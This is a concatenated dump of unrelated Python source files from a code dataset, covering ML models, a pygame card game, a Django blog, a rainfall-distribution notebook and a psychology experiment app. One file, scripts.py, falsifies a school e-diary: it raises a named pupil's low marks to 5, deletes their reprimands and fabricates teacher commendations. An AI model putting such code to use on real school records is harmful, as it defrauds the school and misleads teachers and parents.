optimal\n optimal = tf.train.AdamOptimizer(0.001).minimize(loss_function)\n\n # define the initializer and session\n init = tf.global_variables_initializer()\n sess = tf.Session()\n\n # initialize\n sess.run(init)\n\n # plot the image\n fig = plt.figure()\n image_fig = fig.add_subplot(2, 1, 1)\n\n # plot the loss\n loss_fig = fig.add_subplot(2, 1, 2)\n loss_history = []\n\n # interactive mode on, could dynamic refresh the picture\n plt.ion()\n plt.show()\n\n for i in range(TRAINING_ITER_NUM):\n # random get index\n batch_index = np.random.randint(0, len(train_labels), [BATCH_SIZE])\n\n loss = 0\n\n # define the data\n x_data = np.zeros([BATCH_SIZE, 784])\n y_data = np.zeros([BATCH_SIZE, 10])\n\n for index in range(BATCH_SIZE):\n # get image and label, then add it into x_data and y_data\n x_ = train_images[batch_index[index]].reshape([1, 784])\n\n # y is one hot data\n # for example, if a image is 5\n # the y is [0 0 0 0 0 1 0 0 0 0]\n y_ = np.zeros([1, 10])\n y_[0, train_labels[batch_index[index]]] = 1\n\n # add the image and label into x_data and y_data\n x_data[index] = x_\n y_data[index] = y_\n\n # training\n _, loss = sess.run([optimal, loss_function], feed_dict={x_original_data: x_data, y_true: y_data})\n\n # get average loss\n loss /= BATCH_SIZE\n\n # add loss to history\n loss_history.append(loss)\n\n # output the training details\n print('Epoch {0}: {1}'.format(i, loss))\n\n if i % 10 == 0:\n # plot the loss\n loss_fig.plot(np.arange(len(loss_history)), loss_history, 'r-')\n plt.pause(0.05)\n\n # test on test set, and calculate the accuracy\n accuracy = 0\n for i in range(len(test_labels)):\n result = sess.run(predict, feed_dict={x_original_data: test_images[i].reshape([1, 784])})\n result = np.argmax(result[0])\n if result == test_labels[i]:\n accuracy += 1\n\n # output the accuracy\n print(\"-------------------------------\")\n print(\"Accuracy on test set: {} %\".format(accuracy * 100.0 / len(test_labels)))\n print(\"-------------------------------\")\n\n # test the network on test set\n # random get some data and test the network\n test_index = np.random.randint(0, len(test_images), [TEST_ITER_NUM])\n for i in range(TEST_ITER_NUM):\n # show the image\n image_fig.imshow(train_images[test_index[i]], cmap='gray')\n\n # predict by network\n result = sess.run(predict, feed_dict={x_original_data: train_images[test_index[i]].reshape([1, 784])})\n result = np.argmax(result[0])\n print(\"True Label: {0} --- Predict: {1} --- {2}\"\n .format(train_labels[test_index[i]], result, train_labels[test_index[i]] == result))\n image_fig.set_title(\"True Label: {0} --- Predict: {1} --- {2}\"\n .format(train_labels[test_index[i]], result, train_labels[test_index[i]] == result))\n plt.pause(1.0)\n\n plt.ioff()\n plt.show()\n","sub_path":"SupervisedLearning/MNIST_CNN.py","file_name":"MNIST_CNN.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589084399","text":"\"\"\"\nMain module for running spider game.\n\nCreated on 16.11.2018\n\n@author: Ruslan Dolovanyuk\n\n\"\"\"\n\nimport pickle\nimport random\nimport time\n\nfrom configparser import ConfigParser\n\nfrom audio import Music\nfrom audio import Sound\n\nfrom board import Board\n\nfrom constants import Colors\n\nfrom player import Actions\nfrom player import Player\n\nimport pygame\n\nfrom speech import Speech\n\n\nclass Game:\n \"\"\"Main running class for game.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize running class.\"\"\"\n self.config = ConfigParser()\n self.config.read('settings.ini')\n self.size_x = self.config.getint('screen', 'size_x')\n self.size_y = self.config.getint('screen', 'size_y')\n\n with open('languages.dat', 'rb') as lang_file:\n self.phrases = pickle.load(lang_file)[self.config.get('total', 'language')]\n\n self.speech = Speech(self.config)\n self.speech.speak(self.phrases['start'])\n\n pygame.init()\n pygame.font.init()\n pygame.mixer.init()\n\n self.screen = pygame.display.set_mode((self.size_x, self.size_y))\n pygame.display.set_caption(self.phrases['title'])\n\n self.music = Music(self.config.getfloat('audio', 'music_volume'))\n self.sounds = Sound(self.config.getfloat('audio', 'sound_volume'))\n\n self.board = Board(self.config, self.screen, self.sounds)\n self.player = Player(self.board, self.speech, self.phrases)\n self.game_over = True\n self.win = False\n\n self.STOPPED_PLAYING = pygame.USEREVENT + 1\n pygame.mixer.music.set_endevent(self.STOPPED_PLAYING)\n self.fontObj = pygame.font.SysFont('arial', 50)\n self.clock = pygame.time.Clock()\n\n random.seed()\n self.music_play()\n self.new_game()\n\n def mainloop(self):\n \"\"\"Run main loop game.\"\"\"\n self.running = True\n while self.running:\n self.handle_events()\n self.draw()\n\n self.clock.tick(15)\n pygame.display.flip()\n\n self.speech.speak(self.phrases['finish'])\n self.speech.finish()\n pygame.quit()\n\n def handle_events(self):\n \"\"\"Check all game events.\"\"\"\n for event in pygame.event.get():\n if pygame.QUIT == event.type:\n self.running = False\n if self.STOPPED_PLAYING == event.type:\n self.music_play()\n elif pygame.KEYDOWN == event.type:\n if pygame.K_ESCAPE == event.key:\n self.running = False\n elif pygame.K_F1 == event.key:\n self.help()\n elif pygame.K_F2 == event.key:\n self.turn_music()\n elif pygame.K_F3 == event.key:\n self.change_level()\n elif pygame.K_F4 == event.key:\n self.change_deck()\n elif pygame.K_F5 == event.key:\n self.new_game()\n elif pygame.K_F9 == event.key:\n self.change_language()\n elif pygame.K_TAB == event.key and pygame.key.get_mods() & pygame.KMOD_SHIFT:\n if not self.game_over:\n self.player.actions(Actions.ChangeZoneDown)\n elif pygame.K_TAB == event.key:\n if not self.game_over:\n self.player.actions(Actions.ChangeZoneUp)\n elif pygame.K_LEFT == event.key:\n if not self.game_over:\n self.player.actions(Actions.ChangeRowDown)\n elif pygame.K_RIGHT == event.key:\n if not self.game_over:\n self.player.actions(Actions.ChangeRowUp)\n elif pygame.K_UP == event.key:\n if not self.game_over:\n self.player.actions(Actions.ChangeCardUp)\n elif pygame.K_DOWN == event.key:\n if not self.game_over:\n self.player.actions(Actions.ChangeCardDown)\n elif pygame.K_SPACE == event.key:\n if not self.game_over:\n self.player.actions(Actions.Take)\n self.check_win()\n\n def draw(self):\n \"\"\"Main draw function.\"\"\"\n self.screen.fill(Colors.DARKGREEN)\n self.board.draw()\n if self.game_over:\n if self.win:\n textSurfaceObj = self.fontObj.render(self.phrases['win'], True, Colors.GREEN)\n else:\n textSurfaceObj = self.fontObj.render(self.phrases['game_over'], True, Colors.RED)\n textRectObj = textSurfaceObj.get_rect()\n textRectObj.center = (self.size_x // 2, self.size_y // 2)\n self.screen.blit(textSurfaceObj, textRectObj)\n else:\n self.player.draw()\n\n def music_play(self):\n \"\"\"Change music play.\"\"\"\n if self.config.getboolean('audio', 'music'):\n name = random.choice(self.music.get_music_names())\n self.music.play(name)\n\n def check_win(self):\n \"\"\"Check win game.\"\"\"\n all_kings = 0\n for row in self.board.zones[1].rows:\n if row and 'king' == row[-1].rate:\n all_kings += 1\n if 8 == all_kings:\n self.game_over = True\n self.win = True\n self.speech.speak(self.phrases['win'])\n\n def new_game(self):\n \"\"\"Start new game.\"\"\"\n self.speech.speak(self.phrases['new_game'])\n self.game_over = False\n self.win = False\n self.board.create_deck()\n self.board.clear_zones()\n self.board.distribution()\n self.player.reset()\n self.player.speak()\n\n def help(self):\n \"\"\"Speak help for keys control game.\"\"\"\n language = self.config.get('total', 'language')\n with open('help.dat', 'rb') as help_file:\n data = pickle.load(help_file)\n for line in [line for line in data[language] if '\\n' != line]:\n self.speech.speak(line)\n\n shift = len(line) // 5\n timeout = shift * 0.3\n time.sleep(timeout)\n\n def turn_music(self):\n \"\"\"On or off music in game.\"\"\"\n if self.config.getboolean('audio', 'music'):\n self.config.set('audio', 'music', 'false')\n pygame.mixer.music.stop()\n self.speech.speak(self.phrases['music_off'])\n else:\n self.config.set('audio', 'music', 'true')\n self.music_play()\n self.speech.speak(self.phrases['music_on'])\n with open('settings.ini', 'w') as config_file:\n self.config.write(config_file)\n\n def change_level(self):\n \"\"\"Change level: begin, middle, hard.\"\"\"\n if 'begin' == self.config.get('board', 'level'):\n self.config.set('board', 'level', 'middle')\n self.speech.speak(self.phrases['middle'])\n elif 'middle' == self.config.get('board', 'level'):\n self.config.set('board', 'level', 'hard')\n self.speech.speak(self.phrases['hard'])\n else:\n self.config.set('board', 'level', 'begin')\n self.speech.speak(self.phrases['begin'])\n with open('settings.ini', 'w') as config_file:\n self.config.write(config_file)\n\n def change_deck(self):\n \"\"\"Change deck on game: 52 or 36.\"\"\"\n if 'half' == self.config.get('board', 'deck'):\n self.config.set('board', 'deck', 'full')\n self.speech.speak(self.phrases['52_cards'])\n else:\n self.config.set('board', 'deck', 'half')\n self.speech.speak(self.phrases['36_cards'])\n with open('settings.ini', 'w') as config_file:\n self.config.write(config_file)\n\n def change_language(self):\n \"\"\"Change language for phrases.\"\"\"\n if 'ru' == self.config.get('total', 'language'):\n self.config.set('total', 'language', 'en')\n with open('languages.dat', 'rb') as lang_file:\n self.phrases = pickle.load(lang_file)['en']\n else:\n self.config.set('total', 'language', 'ru')\n with open('languages.dat', 'rb') as lang_file:\n self.phrases = pickle.load(lang_file)['ru']\n self.player.phrases = self.phrases\n self.speech.speak(self.phrases['language'])\n with open('settings.ini', 'w') as config_file:\n self.config.write(config_file)\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"6799680","text":"import threading\nimport time\ndef run(n):#只会锁lock范围内的部分\n print(\"task %s start\"%i)\n lock.acquire()\n\n global num\n num+= 1\n time.sleep(1)\n\n print(num)\n lock.release()\n print(\"task %s end\"%i)\n\nstart_time = time.time()\nlock = threading.Lock()\nnum = 0\nt_objs = []\nfor i in range (50):\n t = threading.Thread(target = run,args = (i,))\n t.start()\n t_objs.append(t)\nfor t in t_objs:\n t.join()\n\nprint(\"num\",num)\n","sub_path":"threading/example_thread_lock.py","file_name":"example_thread_lock.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"94869294","text":"'''in this what we have calculated is largest sum possible'''\n'''this algorithm has complexity O(N)'''\n\ndef largest_cont_sum(arr):\n max_sum=current_sum=arr[0]\n for num in arr[1:]:\n current_sum=max(current_sum+num,num)\n max_sum=max(current_sum,max_sum)\n return max_sum\n\nlargest_cont_sum([1,2,-1,3,4,10,10,-10,-1])\nprint(largest_cont_sum([1,2,-1,3,4,10,10,-10,-1]))\n\n","sub_path":"Mix Questions/05_largests_Sum.py","file_name":"05_largests_Sum.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610362963","text":"import random\nfrom datacenter.models import Schoolkid, Lesson, Mark, Chastisement, Subject, Commendation\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\n\ndef get_schoolkid_detail(schoolkid):\n try:\n return Schoolkid.objects.get(full_name__contains=schoolkid)\n except (ObjectDoesNotExist, MultipleObjectsReturned) as ex:\n print('please, specify correct schoolkid name', ex)\n\n\ndef fix_marks(schoolkid):\n try:\n schoolkid_detail = Schoolkid.objects.get(full_name__contains=schoolkid)\n Mark.objects.filter(schoolkid=schoolkid_detail, \n points__in=[2,3]).update(points=5)\n except (ObjectDoesNotExist, MultipleObjectsReturned) as ex:\n print('please, specify correct schoolkid name', ex)\n\n\ndef remove_chastisements(schoolkid):\n try:\n schoolkid_detail = Schoolkid.objects.get(full_name__contains=schoolkid)\n Chastisement.objects.filter(schoolkid__full_name__contains=schoolkid).delete()\n except (ObjectDoesNotExist, MultipleObjectsReturned) as ex:\n print('please, specify correct schoolkid name', ex)\n\n\ndef create_commendation(schoolkid, subj):\n commend_list = ['Молодец!',\n 'Отлично!',\n 'Хорошо!',\n 'Гораздо лучше, чем я ожидал!',\n 'Ты меня приятно удивил!',\n 'Великолепно!',\n 'Прекрасно!', \n 'Ты меня очень обрадовал!',\n 'Именно этого я давно ждал от тебя!']\n try:\n schoolkid_detail = Schoolkid.objects.get(full_name__contains=schoolkid)\n subject = Subject.objects.get(title=subj, year_of_study=schoolkid_detail.year_of_study)\n except (ObjectDoesNotExist, MultipleObjectsReturned):\n print('please, specify correct schoolkid or subject name')\n return\n lessons = Lesson.objects.filter(year_of_study=schoolkid_detail.year_of_study,\n group_letter=schoolkid_detail.group_letter,\n subject__title=subj).order_by('-date') \n teacher = lessons[0].teacher\n date_commend = lessons[0].date\n comm = Commendation(text=random.choice(commend_list), created=date_commend, schoolkid=schoolkid_detail, subject=subject, teacher=teacher)\n comm.save()\n\n","sub_path":"scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379442674","text":"from concurrent.futures import ThreadPoolExecutor\n\n\n\ndef misc():\n path = '/Volumes/crypt/_programm/_DropBox/Dropbox/_Coding/PYTHON/penetration/wordpress/Duplicator/MEMORY_DEBUG_1.txt'\n\n lines = [int(line.strip().split('|')[2].strip()) for line in open(str(path)) if 'seen_set' in line]\n delta_ls = []\n print(lines)\n for index,num in enumerate(lines):\n if index == 0:\n continue\n\n percent = round((float(num)/float(lines[index-1]))*100) - 100\n delta_ls.append(percent)\n\n print(delta_ls)\n\n\nif __name__ == '__main__':\n misc()\n","sub_path":"tests/cruzer/test_restarter.py","file_name":"test_restarter.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576307311","text":"from queue import PriorityQueue\n\n\nclass BattleStateMachine(object):\n def __init__(self, player1, player2):\n self.game_states = {\"start\", \"turn_start\", \"turn_input\", \"turn_resolve\", \"turn_end\", \"end\"}\n self.players = [player1, player2]\n self.bot_abilities = []\n self.eot_abilities = []\n self.turn_counter = 0\n\n for player in self.players:\n player.select_character()\n\n def update_abilities(self):\n for player in self.players:\n for ability in player.active_character.bot_abilities:\n self.bot_abilities.append((-ability.speed,ability))\n for ability in player.active_character.eot_abilities:\n self.eot_abilities.append((-ability.speed,ability))\n\n def check_for_death(self):\n character_has_died = False\n for player in self.players:\n if player.active_character.hp == 0:\n print(player.active_character.name,\"has fallen!\")\n player.select_character()\n character_has_died = True\n if character_has_died:\n return True\n return False\n\n def begin_turn(self):\n self.turn_counter += 1\n print(\"Turn\", self.turn_counter)\n ability_queue = AbilityQueue(self.bot_abilities)\n while ability_queue:\n ability = ability_queue.get()\n ability.do()\n if self.check_for_death():\n break\n\n def end_turn(self):\n # update player information\n ability_queue = AbilityQueue(self.eot_abilities)\n while ability_queue:\n ability = ability_queue.get()\n ability.do()\n\n def game_loop(self):\n self.begin_turn()\n self.end_turn()\n\nclass AbilityQueue(PriorityQueue):\n def __init__(self, ability_list):\n super(PriorityQueue).__init__()\n for item in ability_list:\n self.put(item)","sub_path":"_baseObjects/BattleStateMachine.py","file_name":"BattleStateMachine.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569039700","text":"import DenseNet\r\nimport numpy as np\r\nimport keras.backend as K\r\n\r\nfrom keras.datasets import cifar10\r\nfrom keras.optimizers import SGD\r\nfrom keras.utils import np_utils\r\nfrom keras.callbacks import LearningRateScheduler\r\nimport getData\r\n\r\ndef RunDenseNet(batch_size, nb_epoch, depth, nb_dense_block, nb_filter, growth_rate, dropout_rate, weight_decay):\r\n (X_train, Y_train), (X_test, Y_test), nb_classes, img_dim = getData.getData();\r\n model = DenseNet.DenseNet(nb_classes, img_dim, depth, nb_dense_block, growth_rate, nb_filter, dropout_rate, weight_decay)\r\n model.summary();\r\n \"\"\"Paper Suggests using SGD\"\"\"\r\n opt = SGD(lr=0.0, momentum = 0.9, nesterov = True, decay= weight_decay)\r\n\r\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=[\"accuracy\"])\r\n \"\"\"Custom learning Schedule\"\"\"\r\n lrs = LearningRateScheduler(custom_LR, verbose=1)\r\n print(\"Training\")\r\n model.fit(x=X_train, y=Y_train, batch_size=batch_size, epochs=nb_epoch, callbacks = [lrs], verbose=2)\r\n print(\"Evaluating\")\r\n scores = model.evaluate(X_test, Y_test, batch_size=64, verbose=2)\r\n print('Test Loss: ', scores[0])\r\n print('Test Accuracy: ', scores[1])\r\n model.save(\"model.h5\")\r\n\r\n\r\n\"\"\"Learning Schedule. Divides lr by 10 after exceeding %50 and %75 of Epochs\"\"\"\r\ndef custom_LR(epoch):\r\n lr = 0.1 #UPDATE LEARNING RATE HERE\r\n if (epoch >= int(0.5 * 25)): #MANUALLY UPDATE EPOCH COUNT HERE\r\n lr = lr/10\r\n if (epoch >= int(0.75 * 25)): #MANUALLY UPDATE EPOCH COUNT HERE\r\n lr = lr/10\r\n return lr\r\n\r\n\r\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482871159","text":"\n# coding: utf-8\n\n# In[ ]:\n\n### Rewrite the MP distribtuion as a function\n\n\n# In[5]:\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nget_ipython().magic('matplotlib inline')\nplt.style.use('ggplot')\n\ndef marshallpalmer(R):\n \"\"\"\n marshall palmer size distribution\n given rainrate R in mm/hr, return\n n(D), the number concentration of drops with\n diameter D\n\n Parameters\n ----------\n R: float\n rainrate (mm/hr)\n\n Returns\n -------\n\n d: vector (float)\n drop diameters (cm)\n\n n: vector (float)\n the number distribution n(d) #m^{-3} mm^{-1}\n\n \"\"\"\n D=np.arange(0,8,0.01)\n Dmm=D\n Dcm=D*0.1\n N0=0.08*1.e6*1.e-1 #m**{-3} mm^{-1}\n theLambda=41*R**(-0.21)\n n=N0*np.exp(-theLambda*Dcm)\n return Dcm,n\n\ncurve_dict={}\nRvals = [1,5,25]\nfor R in Rvals:\n diam,ndist = marshallpalmer(R)\n curve_dict[R] = ndist\nfig, ax = plt.subplots(1,1,figsize=(10,8))\nfor R in Rvals:\n ax.semilogy(diam,curve_dict[R],label='{} mm/hr'.format(R))\nax.set_xlabel('Drop diameter (mm)')\nax.set_ylabel('$n(D) m^{-3} mm^{-1}$')\nax.set_title('Marshall Palmer distribution for three rain rates')\nout=ax.legend(loc='best')\n\n\n# ### Get the integrated precipitation flux for R=15 mm/hour\n# \n# Try this with two different fall speeds -- Thompkins p. 77 and the Nature article\n\n# In[6]:\n\ndef find_uthompkins(diams):\n \"\"\"\n Thompkins p. 77 table\n \n Parameters\n ----------\n \n diams: vector of floats\n drop diamter (meters)\n \n Returns\n -------\n \n vel_vec: vector of floats\n fall speed (m/s) \n \"\"\"\n diams = np.atleast_1d(diams)\n rvals = diams/2.\n #diam in meters, thompkins p. 77\n vel_list=[]\n #\n # \n #\n edges = np.array([0,30,1000,8000])*1.e-6 #meters\n bins = np.searchsorted(edges,rvals)\n for r, bin in zip(rvals,bins):\n if bin == 1:\n vel = 1.2e8*r**2.\n elif bin == 2:\n vel = 6.e3*r #Thompkins says 8000?\n elif bin == 3:\n vel = 250*0.75*np.sqrt(r) #0.75 fudge factor to get curve match\n else:\n if r==0:\n vel=0.\n else:\n raise ValueError('droplet size out of bounds')\n vel_list.append(vel)\n return np.array(vel_list)\n \n#find the rain rate for a dropsize distribution\n#specified by a marshall-palmer distribution of 15 mm/hour\nimport numpy as np\ng=9.8 #m/s^2\nrho=1 #kg/m^3 air density\nrhol=1000. #kg/m^3 liquid water density\nR=15 #mm/hr\ndiam,ndist = marshallpalmer(R)\ndiam = diam*1.e-2 #meters\nUnature=np.sqrt(rhol/rho*g*diam) #m/s Villermaux and Bossa, 2009\nUthompkins = find_uthompkins(diam) #thompkins\nU=Unature\nbinwidth = np.diff(diam)[0]*1.e3 #mm\nR=np.sum(ndist*np.pi*(diam**3)/6*U*binwidth) #flux in m/s\nR=R*1000*3600. #mm/hour\nout_mesg='\\nfor R=15 mm/hour integration gives {:8.2f} mm/hour\\n'\nprint(out_mesg.format(R))\n\n\n# In[7]:\n\nfig,ax = plt.subplots(1,1)\nax.plot(diam*1.e3,Uthompkins,label='thompkins U (m/s)')\nax.plot(diam*1.e3,Unature,label='nature U (m/s)')\nax.legend(loc='best')\nout=ax.set(xlabel='diam (mm)',ylabel='fall speed (m/s)')\n\n\n# ### Find the mean diameter and show that it is close to 1/Lambda, as expected\n\n# In[8]:\n\nR = 15 #mm/hr\ntheLambda=41*R**(-0.21)\nprint('mean diameter = {:6.3g} cm'.format(1./theLambda))\ndiam,ndist = marshallpalmer(R) #cm, m^{-3} mm^{-1}\nbinwidth = np.diff(diam)[0]*10 #bin width in mm\napprox_diam = np.sum(diam*ndist*binwidth)/np.sum(ndist*binwidth)\nprint('approx diameter = {:6.3g} cm'.format(approx_diam))\n\n\n# In[ ]:\n\n\n\n","sub_path":"notebooks/python/marshallpalmer.py","file_name":"marshallpalmer.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"178228009","text":"from utils.listnode import ListNode\n\n\nclass Solution:\n def rotateRight(self, head: ListNode, k: int) -> ListNode:\n if not head or not head.next or k == 0:\n return head\n\n # 链表长度\n n = 1\n # 计算链表长度,并且将链表变成环\n cur = head\n while cur.next:\n cur = cur.next\n n += 1\n cur.next = head\n\n k = k % n\n # if k == 0:\n # return head\n\n # 取从末尾开始的 (k + 1) th\n # 相当与从开头的 (n - k - 1) th\n cur = head\n for _ in range(n - k - 1):\n cur = cur.next\n\n res = cur.next\n cur.next = None\n return res\n","sub_path":"week4/rotate_list.py","file_name":"rotate_list.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262447753","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('articles', views.ArticleListView.as_view(), name='articles'),\n path('article/', views.ArticleDetailView.as_view(), name='article-detail'),\n path('authors', views.AuthorListView.as_view(), name='authors'),\n path('author/', views.AuthorDetailView.as_view(), name='author-detail'),\n path('article//comment/', views.CommentCreate.as_view(), name='comment-create'),\n path('register/', views.Registration.as_view(), name='register'),\n]","sub_path":"myminiblog/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494355654","text":"from .raghakot import resnet_raghakot as res\nfrom .fchollet import resnet50 as fres\nfrom keras.layers import Input, Dense, Flatten\nfrom keras.models import Model\nimport keras.backend as K\n\n\ndef resnet(weights=None, depth=50, input_size=224, channels=3, output_channels=1000):\n assert (depth in [18, 34, 50, 101, 152]), \"Depth needs to be one of the following: [18, 34, 50, 101, 152]\"\n if weights == 'imagenet':\n assert (depth == 50)\n\n if K.backend() == 'theano':\n K.set_image_dim_ordering('th')\n\n if K.image_dim_ordering() == 'th':\n input_tensor = Input((channels, input_size, input_size))\n else:\n input_tensor = Input((input_size, input_size, channels))\n if depth is 18:\n model = res.ResnetBuilder.build_resnet_18((channels, input_size, input_size), output_channels)\n elif depth is 34:\n model = res.ResnetBuilder.build_resnet_34((channels, input_size, input_size), output_channels)\n elif depth is 50:\n base_model = fres.ResNet50(input_tensor=input_tensor, include_top=False)\n x = base_model.output\n x = Flatten()(x)\n x = Dense(output_channels, activation='softmax', name='pred')(x)\n model = Model(inputs=base_model.input, outputs=x)\n # model = res.ResnetBuilder.build_resnet_50((channels, input_size, input_size), output_channels)\n elif depth is 101:\n model = res.ResnetBuilder.build_resnet_101((channels, input_size, input_size), output_channels)\n elif depth is 152:\n model = res.ResnetBuilder.build_resnet_152((channels, input_size, input_size), output_channels)\n # else:\n # print 'should never reach here'\n # model = res.ResnetBuilder.build_resnet_50((image_channels, image_dims, image_dims), output_channels)\n\n # model.compile(loss=\"categorical_crossentropy\", optimizer=\"sgd\")\n return model","sub_path":"keras_code/cnns/model_defs/resnet_wrapper.py","file_name":"resnet_wrapper.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"129385871","text":"from sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import OneHotEncoder\nimport mglearn\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nX, y = mglearn.datasets.make_wave(n_samples=120)\nline = np.linspace(-3, 3, 1000, endpoint=False).reshape(-1, 1)\n\nbins = np.linspace(-3, 3, 11)\nprint('bins:{}'.format(bins))\n\nwhitch_bin = np.digitize(X, bins=bins)\nprint('\\ndata point:\\n', X[:5])\nprint('\\ndata point bins:\\n', whitch_bin[:5])\n\nencoder = OneHotEncoder(sparse=False)\nencoder.fit(whitch_bin)\nx_binned = encoder.transform(whitch_bin)\n\n#X_combined = np.hstack([X, x_binned])\nX_product = np.hstack([x_binned, X * x_binned])\n\nline_binned = encoder.transform(np.digitize(line, bins=bins))\n\n'''\nreg = LinearRegression().fit(X_combined, y)\nline_combined = np.hstack([line, line_binned])\nplt.plot(line, reg.predict(line_combined), label='linear regression')\n\n'''\nreg = LinearRegression().fit(X_product, y)\nline_product = np.hstack([line_binned, line * line_binned])\nplt.plot(line, reg.predict(line_product), label='linear regression2')\n\n\nfor bin in bins:\n plt.plot([bin, bin], [-3, 3], ':', c='k', linewidth=1)\nplt.legend(loc=\"best\")\nplt.ylabel(\"linear output\")\nplt.xlabel(\"input attr\")\nplt.plot(X[:, 0], y, 'o', c='k')\nplt.show()\n","sub_path":"chap10/interactionEx.py","file_name":"interactionEx.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"497022061","text":"import csv\nimport tkinter as tk\nfrom random import randint\nimport time\n\nimport config\nimport landing\nimport background_questions\nimport instructions\nimport experiment\nimport questionnaire\nimport thank_you\n\npages = []\noutput = []\n\n\ndef append_data(*args):\n global output\n output += list(args)\n\n\ndef save_output():\n output_csv = open('output.csv', 'a')\n csv_writer = csv.writer(output_csv)\n csv_writer.writerow(output)\n\n\ndef get_experiment_type():\n random_experiment = randint(-1, 1)\n if random_experiment == -1:\n return 'negative'\n elif random_experiment == 0:\n return 'neutral'\n else:\n return 'positive'\n\n\ndef forget_other_pages(current_page):\n for page in pages:\n if current_page != page:\n page.pack_forget()\n\n\ndef activate_page(page):\n forget_other_pages(page)\n page.pack(fill=tk.BOTH, expand=tk.YES)\n pages.append(page)\n\n\ndef activate_landing():\n landing_data = landing.generate_page(root, window_w, activate_background_questions)\n activate_page(landing_data)\n\n\ndef activate_background_questions():\n background_questions_data = background_questions.generate_page(root,\n window_w,\n activate_instructions,\n append_data)\n activate_page(background_questions_data)\n\n\ndef activate_instructions():\n experiment_type = get_experiment_type()\n instructions_data = instructions.generate_page(root, window_w, activate_experiment, experiment_type)\n activate_page(instructions_data)\n\n\ndef activate_experiment(experiment_type):\n experiment_data = experiment.generate_page(root, window_w, activate_questionnaire, experiment_type, append_data)\n activate_page(experiment_data['frame'])\n experiment_initialized = time.time()\n experiment.refresh_page(\n root,\n activate_questionnaire,\n experiment_initialized,\n experiment_type,\n experiment_data['data'],\n append_data)\n\n\ndef activate_questionnaire(earnings):\n questionnaire_data = questionnaire.generate_page(root, activate_thank_you, earnings, append_data)\n activate_page(questionnaire_data)\n\n\ndef activate_thank_you(earnings):\n thank_you_data = thank_you.generate_page(root, window_w, earnings)\n activate_page(thank_you_data)\n save_output()\n\n\n# Create main window\nroot = tk.Tk()\n\n# Full screen\nwindow_w = root.winfo_screenwidth()\nwindow_h = root.winfo_screenheight()\nroot.attributes(\"-fullscreen\", True)\n\nroot.configure(background=config.background_color)\n\nactivate_landing()\n\n# Start tkinter event - loop\nroot.mainloop()\n","sub_path":"kampi.py","file_name":"kampi.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"428089926","text":"import numpy as np\nfrom scipy.special import digamma\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef softmax(x, axis=-1, take_exp=True):\n if take_exp:\n x = x - np.expand_dims(x.max(axis=axis), axis=axis).repeat(x.shape[axis], axis)\n x = np.exp(x)\n return x / np.expand_dims(x.sum(axis), axis=axis).repeat(x.shape[axis], axis)\n\n\ndef xavier_init(shape0, shape1):\n return np.random.normal(loc=0, scale=2/(shape0 + shape1), size=(shape0, shape1))\n\n\nclass RBMSBM(object):\n \"\"\"\n Implements the model that combines RBM and SBM for directed networks with a prior on B. Uses the standard\n implementation of RBM's contrastive divergence. Handles missing edges.\n \"\"\"\n def __init__(self, N, K, M, alphas, betas):\n \"\"\"\n :param N: Number of nodes\n :param K: Number of communities\n :param M: Number of attributes\n :param alphas: (K, K) matrix of prior alphas for B\n :param betas: (K, K) matrix of prior betas for B\n \"\"\"\n super(RBMSBM, self).__init__()\n self.N = N\n self.K = K\n self.M = M\n self.alphas = alphas\n self.betas = betas\n\n # Initialize the weights and biases for RBM\n self.W = xavier_init(self.M, self.K)\n self.b = np.zeros((self.M, 1))\n self.c = np.zeros((self.K, 1))\n\n # Initialize the parameters for posterior on block matrix\n self.alphas_post = alphas\n self.betas_post = betas\n\n # Initialize gradients\n self.grad_b = np.zeros(self.b.shape)\n self.grad_c = np.zeros(self.c.shape)\n self.grad_W = np.zeros(self.W.shape)\n\n # Initialize posterior for class membership\n # self.q = np.random.random(size=(self.N, self.K))\n self.q = np.ones((self.N, self.K))\n self.q = self.q / np.expand_dims(self.q.sum(axis=1), axis=1).repeat(repeats=self.K, axis=1)\n\n # Initialize samples from RBM for persistent 